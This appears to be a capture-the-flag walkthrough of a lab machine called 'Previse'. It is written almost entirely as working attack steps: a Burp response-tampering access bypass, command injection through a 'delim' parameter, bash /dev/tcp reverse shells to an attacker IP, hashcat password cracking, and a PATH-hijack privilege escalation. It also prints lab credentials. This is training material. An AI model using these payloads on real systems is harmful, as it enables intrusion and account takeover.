let's start with Nmap
nmap -sV 10.129.95.185
Let's go to the url
gobuster dir -u 10.129.95.185 -w /usr/share/dirb/wordlists/common.txt -x .php
Go to ip/nav.php
Open burp
Go to proxy
Turn on intercept
Return to the website and click on "Create account" on the website
Go back to proxy
Click on Action --> Do intercept --> response to this request
Then click on forward
Change "302 Found" by "200 OK"
Click on forward
This time we get access to the page to create a new account!
Turn off Intercept in Burp
So let's create an account
username : hello123
password : hello123
click on create user
we are directed to the login page
let's try to login with our new account
we are in!
go to Files
there is a file there
Click on the file to download it.
Check out all the files in it.
Check config.php
We got credentials to access a mysql database!
username: root
password: mySQL_p@ssw0rd!:)
Go back to website
under management menu --> log data
Click submit
we get a file with logs:
Let's use Burp to intercept the request when we click submit to request log data
Go back to Management Menu --> Log Data
Open Burp and under Proxy tab, turn on Intercept
Go back to the website and click on Submit
Go back to Burp to see what was intercepted:
now we are going to add a script after delim=comma like in the screenshot below:
Basically we are replacing:
delim=comma
by:
delim=comma%26curl+http%3a//10.10.14.49%3a4444
URL-encoding to ASCII values:
%3a -----> :
%26 -----> &
Encoded:
delim=comma%26curl+http%3a//10.10.14.49%3a4444
Decoded:
delim=comma&curl+http://10.10.14.49:4444
we are basically running the curl command on port 4444 of our virtual machine. We are now going to listen from our VM on port 4444 and try to get a shell!
curl http://10.10.14.49:4444
Now before we do anything else, open a new command prompt from your VM, type the following netcat command and press enter
nc -lnvp 4444
Now that we have our netcat listening, we intercepted the request and changed the delim=comma,
Let's click on Forward in Burp
Click on Forward in Burp
It worked!
Stop the netcat listener on port 4444 for now. Type Ctrl C to stop.
Now let's do this all over again but this time we replay the request calling the binary /bin/bash to get a reverse shell on port 6666
create a new netcat by using nc -lnvp 6666
change the script from
delim=comma
to
delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.49/6666+0>%261'
If we decode this, it means:
delim=comma&/bin/bash -c 'bash -i > /dev/tcp/10.10.14.49/6666 0>&1'
On Burp click on Forward
we got the shell again!
type id
As usual, let's spawn it by typing:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now earlier we found credentials of the database in the file.
from there let;s try to connect to the mysql database by using
mysql -u root -p
when you are prompted password, type the password found in the file at the beginning
mySQL_p@ssw0rd!:)
we are in!
show databases;
use previse;
show tables;
SELECT * from accounts;
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Save the password into a file called hashed.txt
We can use the hashcat command to get the password.
hashcat -m 500 hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
This might take a few minutes. It tells us below estimated time is 14 minutes. Just wait.
Press s if you want to know the status:
Finished! We got the password below:
ilovecody112235!
Done! we got the password for m4lwhere
We know from the nmap we ran at the very beginning that port 22 is open which is SSH. Let's now try to ssh to the target machine using the username m4lwhere we found earlier.
ssh m4lwhere@10.129.95.185
When prompted for the password, type the password we just found:
ilovecody112235!
It worked and we are in!
ls
cat user.txt
You got the user flag! Congratulations!
As usual, let's do
sudo -l
When prompted for the password for m4lwhere, type:
ilovecody112235!
We find that the user m4lwhere can run the following commands on Previse:
(root) /opt/scripts/access_backup.sh
Let's first check out what this file is by using:
cat /opt/scripts/access_backup.sh
which gzip
cd /tmp
echo "bash -i >& /dev/tcp/10.10.14.49/9080 0>&1" > gzip
this creates a file called gzip in the directory tmp
The file just contains :
bash -i >& /dev/tcp/10.10.14.49/9080 0>&1
chmod +x gzip
this give executable permission to our new file gzip
export PATH=/tmp:$PATH
this adds /tmp to the path.
Open a new prompt on your VM and type:
nc -lnvp 9080
Now go back to the m4lwhere@previse shell and type:
sudo /opt/scripts/access_backup.sh
When you return to your netcat, you notice you got the shell and we are root!
cd ..
cd root
ls
cat root.txt
Congratulations! you got the root flag!
Thanks!!